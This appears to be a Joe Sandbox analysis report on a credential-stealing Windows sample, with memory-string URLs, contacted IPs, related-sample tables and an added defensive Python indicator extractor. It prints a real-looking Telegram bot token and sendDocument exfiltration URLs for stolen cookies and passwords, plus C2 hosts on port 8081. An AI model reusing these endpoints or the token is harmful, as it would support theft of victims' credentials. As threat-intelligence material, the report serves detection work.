https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.000000002551E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.000000002564D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.0000000025750000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254A9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.telegram.org/bot/sendMessage?chat_id=&text= | msiexec.exe, 00000006.00000002.2981297005.00000000244B5000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://chrome.google.com/webstore?hl=en | msiexec.exe, 00000006.00000002.2981297005.0000000024592000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.ecosia.org/newtab/ | msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:745773%0D%0ADate%20a | msiexec.exe, 00000006.00000002.2981297005.00000000244B5000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://varders.kozow.com:8081 | msiexec.exe, 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://aborters.duckdns.org:8081 | msiexec.exe, 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://ac.ecosia.org/autocomplete?q= | msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.google.com | msiexec.exe, 00000006.00000003.2471471790.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2528720464.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471549255.0000000008957000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://51.38.247.67:8081/_send_.php?L | msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://drive.google.com/ | msiexec.exe, 00000006.00000002.2967421092.00000000088DA000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://anotherarmy.dns.army:8081 | msiexec.exe, 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.telegram.org/bot7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw/sendDocument?chat_id=7763 | msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | msiexec.exe, 00000006.00000002.2982840463.0000000025484000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.000000002572B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.0000000025655000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.0000000025628000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254B1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://chrome.google.com/webstore?hl=enlB | msiexec.exe, 00000006.00000002.2981297005.000000002458D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://reallyfreegeoip.org/xml/8.46.123.189$ | msiexec.exe, 00000006.00000002.2981297005.00000000244B5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.000000002448E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.0000000024448000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://reallyfreegeoip.org | msiexec.exe, 00000006.00000002.2981297005.00000000244B5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.000000002448E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.000000002441E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://apis.google.com | msiexec.exe, 00000006.00000003.2471471790.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2528720464.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471549255.0000000008957000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | msiexec.exe, 00000006.00000002.2982840463.0000000025484000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.000000002572B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.0000000025655000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.0000000025628000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254B1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://api.telegram.org | msiexec.exe, 00000006.00000002.2981297005.0000000024575000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | msiexec.exe, 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://reallyfreegeoip.org/xml/ | msiexec.exe, 00000006.00000002.2981297005.000000002441E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
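The memory strings in the tables above carry the indicators a responder would lift from this sample: a Telegram bot token and chat_id in the sendDocument URLs, the API methods used, the label in the caption ("Cookies", "PW") that names the exfiltrated artifact, the geolocation and public-IP checks, and the hosts contacted on port 8081. The Python below is an added example, not part of the report or of the sample; its input list is copied from the report's URL tables (truncated strings left out) and the category names and host sets are my own choices.

```python
"""Pull network indicators out of sandbox memory strings: Telegram bot
token, chat_id and API methods, the artifact label carried in the bot
caption, public-IP/geolocation checks, and hosts on non-standard ports.
Added example; the input strings are copied from the report's URL tables,
the category names and GEOIP_HOSTS set are assumptions."""
import json
import re
from urllib.parse import parse_qs, urlsplit

# Telegram bot tokens have the shape "<bot id>:<35-char secret>" and sit in the URL path,
# so the redacted template "/bot/sendMessage?chat_id=" seen in memory does not match.
TELEGRAM_TOKEN_RE = re.compile(r"/bot(\d+):([A-Za-z0-9_-]{35})(?:/|$)")
TELEGRAM_METHOD_RE = re.compile(r"^/bot[^/]*/(\w+)")

# Services the report shows being used to learn the victim's public IP / country.
GEOIP_HOSTS = {"reallyfreegeoip.org", "checkip.dyndns.org", "checkip.dyndns.com"}


def extract_iocs(strings):
    """Return sorted indicator lists keyed by category."""
    found = {
        "telegram_tokens": set(), "telegram_chat_ids": set(), "telegram_methods": set(),
        "exfil_labels": set(), "geoip_checks": set(), "nonstandard_port_hosts": set(),
    }
    for s in strings:
        u = urlsplit(s.strip())
        if u.scheme not in ("http", "https") or not u.hostname:
            continue
        host = u.hostname.lower()
        if host == "api.telegram.org":
            m = TELEGRAM_TOKEN_RE.search(u.path)
            if m:
                found["telegram_tokens"].add(f"{m.group(1)}:{m.group(2)}")
            m = TELEGRAM_METHOD_RE.match(u.path)
            if m:
                found["telegram_methods"].add(m.group(1))
            q = parse_qs(u.query)  # blank values such as "chat_id=" are dropped
            found["telegram_chat_ids"].update(q.get("chat_id", []))
            for caption in q.get("caption", []):
                # Caption shape seen in the report: "... \r\n\r\n<label> | user | VIP Recovery"
                found["exfil_labels"].add(caption.splitlines()[-1].split("|")[0].strip())
        elif host in GEOIP_HOSTS:
            found["geoip_checks"].add(host)
        elif u.port not in (None, 80, 443):
            found["nonstandard_port_hosts"].add(f"{host}:{u.port}")
    return {k: sorted(v) for k, v in found.items()}


# Strings copied from the report's URL tables; the last two are benign browser
# strings included to show they are ignored.
SAMPLE_STRINGS = [
    "https://api.telegram.org/bot7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw/sendDocument"
    "?chat_id=7763958191&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C"
    "%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery",
    "https://api.telegram.org/bot7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw/sendDocument"
    "?chat_id=7763958191&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C"
    "%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery",
    "https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:745773"
    "%0D%0ADate%20and%20Time:%2017/12/2024%20/%2018:38:32%0D%0ACountry%20Name:%20United%20States",
    "https://api.telegram.org",
    "https://api.telegram.org/bot",
    "https://reallyfreegeoip.org/xml/8.46.123.189",
    "http://checkip.dyndns.org/",
    "http://51.38.247.67:8081/_send_.php?L",
    "http://varders.kozow.com:8081",
    "http://aborters.duckdns.org:8081",
    "http://anotherarmy.dns.army:8081",
    "https://www.office.com/",
    "https://duckduckgo.com/ac/?q=",
]

if __name__ == "__main__":
    print(json.dumps(extract_iocs(SAMPLE_STRINGS), indent=2))
```

The port check treats anything other than 80/443 as worth listing; that is a triage heuristic for this sample's 8081 hosts, not a general rule, and the dynamic-DNS names (duckdns.org, kozow.com, dns.army) would be the ones to block or hunt on first.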
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.21.67.152 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
193.122.6.168 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
158.101.44.242 | unknown | United States | 31898 | ORACLE-BMC-31898US | false
172.217.19.174 | drive.google.com | United States | 15169 | GOOGLEUS | false
142.250.181.97 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1576204
Start date and time: 2024-12-16 16:31:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 2s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: pedido-035241.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@6/16@6/6
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 83
• Number of non-executed functions: 32
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63, 20.109.210.53
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target msiexec.exe, PID 8000 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: pedido-035241.exe
Time | Type | Description
10:32:05 | API Interceptor | 42x Sleep call for process: powershell.exe modified
10:33:29 | API Interceptor | 819x Sleep call for process: msiexec.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
149.154.167.220 | QUOTATION REQUEST - BQS058.exe | Get hash | malicious | MassLogger RAT | Browse |
149.154.167.220 | FT876567090.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | REQUEST FOR QUOTATION 1307-RFQ.exe | Get hash | malicious | MassLogger RAT | Browse |
149.154.167.220 | PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe | Get hash | malicious | VIP Keylogger | Browse |
149.154.167.220 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | SWIFT091816-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse |
149.154.167.220 | REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse |
149.154.167.220 | SWIFT09181-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse |
149.154.167.220 | file.exe | Get hash | malicious | ScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Vidar, Xmrig | Browse |
149.154.167.220 | RdLfpZY5A9.exe | Get hash | malicious | 77Rootkit, XWorm | Browse |
104.21.67.152 | QUOTATION REQUEST - BQS058.exe | Get hash | malicious | MassLogger RAT | Browse |
104.21.67.152 | FT876567090.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
104.21.67.152 | ref_97024130865.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
104.21.67.152 | CITAS_pif.exe | Get hash | malicious | MassLogger RAT | Browse |
104.21.67.152 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
104.21.67.152 | PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe | Get hash | malicious | GuLoader | Browse |
104.21.67.152 | SWIFT091816-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse |
104.21.67.152 | REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse |
104.21.67.152 | SWIFT09181-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse |
104.21.67.152 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
193.122.6.168 | QUOTATION REQUEST - BQS058.exe | Get hash | malicious | MassLogger RAT | Browse | checkip.dyndns.org/
193.122.6.168 | SWIFT091816-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | checkip.dyndns.org/
193.122.6.168 | Shipment 990847575203.pdf.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
193.122.6.168 | Ziraat Bankasi Swift Mesaji.exe | Get hash | malicious | MassLogger RAT | Browse | checkip.dyndns.org/
193.122.6.168 | Request for Quotations and specifications.pdf.exe | Get hash | malicious | MassLogger RAT | Browse | checkip.dyndns.org/
193.122.6.168 | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Get hash | malicious | MassLogger RAT | Browse | checkip.dyndns.org/
193.122.6.168 | Confirm revised invoice to proceed with payment ASAP.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | checkip.dyndns.org/
193.122.6.168 | REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exe | Get hash | malicious | GuLoader | Browse | checkip.dyndns.org/
193.122.6.168 | Bank Swift and SOA PRN0072700314159453_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | checkip.dyndns.org/
193.122.6.168 | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Get hash | malicious | MassLogger RAT | Browse | checkip.dyndns.org/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
checkip.dyndns.com | QUOTATION REQUEST - BQS058.exe | Get hash | malicious | MassLogger RAT | Browse | 193.122.6.168
checkip.dyndns.com | FT876567090.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 158.101.44.242
checkip.dyndns.com | REQUEST FOR QUOTATION 1307-RFQ.exe | Get hash | malicious | MassLogger RAT | Browse | 158.101.44.242
checkip.dyndns.com | PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe | Get hash | malicious | VIP Keylogger | Browse | 132.226.8.169
checkip.dyndns.com | ref_97024130865.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 193.122.130.0
checkip.dyndns.com | CITAS_pif.exe | Get hash | malicious | MassLogger RAT | Browse | 132.226.8.169
checkip.dyndns.com | conferma..exe | Get hash | malicious | MassLogger RAT | Browse | 132.226.8.169
checkip.dyndns.com | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 193.122.130.0
checkip.dyndns.com | PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe | Get hash | malicious | GuLoader | Browse | 158.101.44.242
checkip.dyndns.com | SWIFT091816-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 193.122.6.168
reallyfreegeoip.org | QUOTATION REQUEST - BQS058.exe | Get hash | malicious | MassLogger RAT | Browse | 104.21.67.152
reallyfreegeoip.org | FT876567090.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.67.152
reallyfreegeoip.org | REQUEST FOR QUOTATION 1307-RFQ.exe | Get hash | malicious | MassLogger RAT | Browse | 172.67.177.134
reallyfreegeoip.org | PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe | Get hash | malicious | VIP Keylogger | Browse | 172.67.177.134
reallyfreegeoip.org | ref_97024130865.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 104.21.67.152
reallyfreegeoip.org | CITAS_pif.exe | Get hash | malicious | MassLogger RAT | Browse | 104.21.67.152
reallyfreegeoip.org | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.67.152
reallyfreegeoip.org | PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe | Get hash | malicious | GuLoader | Browse | 104.21.67.152
reallyfreegeoip.org | SWIFT091816-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 104.21.67.152
reallyfreegeoip.org | REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 104.21.67.152
api.telegram.org | QUOTATION REQUEST - BQS058.exe | Get hash | malicious | MassLogger RAT | Browse | 149.154.167.220
api.telegram.org | FT876567090.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | REQUEST FOR QUOTATION 1307-RFQ.exe | Get hash | malicious | MassLogger RAT | Browse | 149.154.167.220
api.telegram.org | PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe | Get hash | malicious | VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | SWIFT091816-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 149.154.167.220
api.telegram.org | REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 149.154.167.220
api.telegram.org | SWIFT09181-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 149.154.167.220
api.telegram.org | RdLfpZY5A9.exe | Get hash | malicious | 77Rootkit, XWorm | Browse | 149.154.167.220
api.telegram.org | 3edTbzftGf.exe | Get hash | malicious | Discord Token Stealer, DotStealer | Browse | 149.154.167.220
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ORACLE-BMC-31898US | QUOTATION REQUEST - BQS058.exe | Get hash | malicious | MassLogger RAT | Browse | 193.122.6.168
ORACLE-BMC-31898US | FT876567090.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 158.101.44.242
ORACLE-BMC-31898US | REQUEST FOR QUOTATION 1307-RFQ.exe | Get hash | malicious | MassLogger RAT | Browse | 158.101.44.242
ORACLE-BMC-31898US | ref_97024130865.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 193.122.130.0
ORACLE-BMC-31898US | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 193.122.130.0
ORACLE-BMC-31898US | PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe | Get hash | malicious | GuLoader | Browse | 158.101.44.242
ORACLE-BMC-31898US | SWIFT091816-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 193.122.6.168
ORACLE-BMC-31898US | REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 158.101.44.242
ORACLE-BMC-31898US | arm5.elf | Get hash | malicious | Unknown | Browse | 147.154.242.4
ORACLE-BMC-31898US | SWIFT09181-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 193.122.130.0
TELEGRAMRU | dZKPE9gotO.exe | Get hash | malicious | Vidar | Browse | 149.154.167.99
TELEGRAMRU | QUOTATION REQUEST - BQS058.exe | Get hash | malicious | MassLogger RAT | Browse | 149.154.167.220
TELEGRAMRU | FT876567090.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
TELEGRAMRU | REQUEST FOR QUOTATION 1307-RFQ.exe | Get hash | malicious | MassLogger RAT | Browse | 149.154.167.220
                                                                                                                                                      PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      nB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                                                                                                                      • 149.154.167.99
                                                                                                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                      • 149.154.167.99
                                                                                                                                                      njrtdhadawt.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                      • 149.154.167.99
                                                                                                                                                      T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                      • 149.154.167.99
                                                                                                                                                      CLOUDFLARENETUShttps://blackcreekgroup.yardione.com/Account/Login%3Chttps://blackcreekgroup.yardione.com/Account/Login%3EGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 104.17.25.14
                                                                                                                                                      KjECqzXLWp.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                      • 172.64.41.3
                                                                                                                                                      cey4VIyGKh.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                      • 172.64.41.3
                                                                                                                                                      a2QjbRJVed.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                      • 104.21.26.41
                                                                                                                                                      10lW8PIn6z.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                      • 104.21.67.227
                                                                                                                                                      G7qoACwDbR.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                      • 172.67.218.238
                                                                                                                                                      xrmYUl8OYx.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                      • 104.21.26.41
                                                                                                                                                      fm2r286nqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.21.112.1
                                                                                                                                                      dZKPE9gotO.exeGet hashmaliciousVidarBrowse
                                                                                                                                                      • 172.64.41.3
                                                                                                                                                      https://secure.togethers.best/messeging.html?top=prestons@infra-metals.comGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 104.21.17.239
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 54328bd36c14bd82ddaa0c04b25ed9ad
QUOTATION REQUEST - BQS058.exe | malicious | MassLogger RAT
  • 104.21.67.152
FT876567090.exe | malicious | Snake Keylogger, VIP Keylogger
  • 104.21.67.152
REQUEST FOR QUOTATION 1307-RFQ.exe | malicious | MassLogger RAT
  • 104.21.67.152
PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe | malicious | VIP Keylogger
  • 104.21.67.152
ref_97024130865.exe | malicious | MassLogger RAT, PureLog Stealer
  • 104.21.67.152
CITAS_pif.exe | malicious | MassLogger RAT
  • 104.21.67.152
TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger
  • 104.21.67.152
PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe | malicious | GuLoader
  • 104.21.67.152
SWIFT091816-24_pdf.exe | malicious | GuLoader, MassLogger RAT
  • 104.21.67.152
REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | malicious | GuLoader, MassLogger RAT
  • 104.21.67.152
Match: 3b5074b1b5d032e5620f69f9f700ff0e
KjECqzXLWp.lnk | malicious | RHADAMANTHYS
  • 149.154.167.220
cey4VIyGKh.lnk | malicious | RHADAMANTHYS
  • 149.154.167.220
https://147.45.47.98/error.js | malicious | Unknown
  • 149.154.167.220
ak3o7AZ3mH.exe | malicious | Babadeda, Conti, Mimikatz
  • 149.154.167.220
GdGXG0bnxH.exe | malicious | Unknown
  • 149.154.167.220
https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSL813n1NSUgoHlh-2FH8jVXE55TTo10JYMDP3MpP9biJ-2BivxRElKJfGcSf3Wm0bk6-2BuL6x9TaALAI-2BL1qw1Dee2Qg-3DwH82_lUpiXeYCZ5wahax4fkypnG65rENS0eHcuXkODr9BV8nkC0Nc6-2BAihSf0cmYNntTLO4SyowozBXe6Qe-2Bbp-2FFF3a1FIQOXuBqEKUpfXMQ5PPxSuhMxN-2FGKw6aVp7-2FrJaFsaK3MxWcXiB-2FQGWayulE8-2FtCvMhmv4KaADpZ-2B0qQmLVPxqh24uJt9FaNBQBIm1l70gJHtveQ3b-2FplaZ4NS9-2FFv9-2FcAZ4BnOdGLbd-2BNZzE9Ba47yxwqIyGzlJ-2BmDN57eM41CachqUTFf5upDlE1JEwIy6eZ7t9nvf-2Fc9lQV8qupSe0IpWj5cFkfBjNJ9myaj1i3KCzGOXUSk-2F4E-2FHX-2BkuwdmqzU7u2OKMrHZeEXOJLiSw-3D#C | malicious | Unknown
  • 149.154.167.220
InvoiceNr274728.pdf.lnk | malicious | LummaC
  • 149.154.167.220
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
  • 149.154.167.220
QUOTATION REQUEST - BQS058.exe | malicious | MassLogger RAT
  • 149.154.167.220
FT876567090.exe | malicious | Snake Keylogger, VIP Keylogger
  • 149.154.167.220
Match: 37f463bf4616ecd445d4a1937da06e19
dZKPE9gotO.exe | malicious | Vidar
  • 142.250.181.97
  • 172.217.19.174
InvoiceNr274728.pdf.lnk | malicious | LummaC
  • 142.250.181.97
  • 172.217.19.174
nB52P46OJD.exe | malicious | Vidar
  • 142.250.181.97
  • 172.217.19.174
file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar
  • 142.250.181.97
  • 172.217.19.174
PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe | malicious | GuLoader
  • 142.250.181.97
  • 172.217.19.174
njrtdhadawt.exe | malicious | Stealc, Vidar
  • 142.250.181.97
  • 172.217.19.174
T0x859fNfn.exe | malicious | Vidar
  • 142.250.181.97
  • 172.217.19.174
InvoiceNr274728.pdf.lnk | malicious | Unknown
  • 142.250.181.97
  • 172.217.19.174
A6IuJ5NneS.lnk | malicious | LummaC
  • 142.250.181.97
  • 172.217.19.174
KlarnaInvoice229837.pdf.lnk | malicious | LummaC
  • 142.250.181.97
  • 172.217.19.174
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: C:\Users\user\AppData\Local\Temp\nso7E83.tmp\nsExec.dll
